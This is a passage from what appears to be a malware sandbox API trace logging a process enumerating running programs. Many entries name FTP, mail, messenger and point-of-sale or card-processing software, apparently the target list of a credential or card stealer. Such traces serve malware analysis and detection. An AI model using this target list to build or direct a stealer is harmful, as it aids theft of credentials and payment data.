dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0183.224] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0183.225] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0183.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0183.228] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.230] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.231] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0183.232] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.234] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.235] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.237] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0183.238] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0183.240] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0183.241] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0183.281] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0183.283] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0183.285] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0183.287] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0183.288] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0183.290] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0183.291] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0183.293] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0183.294] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0183.295] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0183.297] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0183.298] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0183.300] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0183.301] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0183.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0183.304] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0183.306] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0183.307] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0183.309] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0183.311] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0183.313] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0183.357] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0183.359] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0183.361] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0183.363] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0183.365] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0183.367] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0183.369] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0183.370] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0183.372] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0183.374] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0183.376] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0183.378] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0183.380] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0183.382] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0183.383] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0183.386] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0183.388] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0183.390] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0183.436] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0183.438] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0183.440] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0183.442] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0183.444] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0183.445] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0183.447] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0183.449] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0183.451] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0183.452] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0183.454] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0183.456] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0183.458] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0183.460] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0183.461] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0183.463] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0183.465] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0183.466] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0183.468] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0183.469] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0183.509] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0183.511] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0183.513] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0183.515] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.516] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.518] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0183.519] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.521] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.523] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0183.525] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0183.526] Process32Next (in: hSnapshot=0x17ec, 